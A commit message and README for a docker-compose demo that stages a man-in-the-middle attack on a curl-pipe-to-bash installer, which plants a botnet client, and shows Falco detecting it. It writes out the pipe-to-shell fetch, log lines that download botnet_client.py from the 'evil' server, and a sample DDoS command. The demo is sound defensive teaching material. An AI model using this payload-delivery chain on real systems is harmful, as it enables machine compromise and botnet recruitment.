139ee56af7
Adding docker-compose based example of man-in-the-middle attack against installation scripts and how it can be detected using sysdig falco. The docker-compose environment starts a good web server, compromised nginx installation, evil web server, and a copy of sysdig falco. The README walks through the process of compromising a client by using curl http://localhost/get-software.sh | bash and detecting the compromise using ./fbash. The fbash program included in this example fixes https://github.com/draios/falco/issues/46.
#Demo of falco with man-in-the-middle attacks on installation scripts
For context, see the corresponding blog post for this demo.
Demo architecture
Initial setup
Make sure no prior botnet_client.py processes are lying around.
Start everything using docker-compose
From this directory, run the following:
$ docker-compose -f demo.yml up
This starts the following containers:
- apache: the legitimate web server, serving files from
.../mitm-sh-installer/web_root, specifically the fileinstall-software.sh. - nginx: the reverse proxy, configured with the config file
.../mitm-sh-installer/nginx.conf. - evil_apache: the "evil" web server, serving files from
.../mitm-sh-installer/evil_web_root, specifically the filebotnet_client.py. - attacker_botnet_master: constantly trying to contact the botnet_client.py process.
- falco: will detect the activities of botnet_client.py.
Download install-software.sh, see botnet client running
Run the following to fetch and execute the installation script, which also installs the botnet client:
$ curl http://localhost/install-software.sh | bash
You'll see messages about installing the software. (The script doesn't actually install anything, the messages are just for demonstration purposes).
Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:
$ ps auxww | grep python
...
root 19983 0.1 0.4 33992 8832 pts/1 S 13:34 0:00 python ./botnet_client.py
$ telnet localhost 1234
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:
attacker_botnet_master | Trying to contact compromised machine...
attacker_botnet_master | Waiting for botnet command and control commands...
attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
attacker_botnet_master | **********Contacted compromised machine, sent botnet commands
At this point, kill the botnet_client.py process to clean things up.
Run installation script again using fbash, note falco warnings.
If you run the installation script again:
curl http://localhost/install-software.sh | ./fbash
In the docker-compose output, you'll see the following falco warnings:
falco | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
falco | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
falco | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
falco | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
falco | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)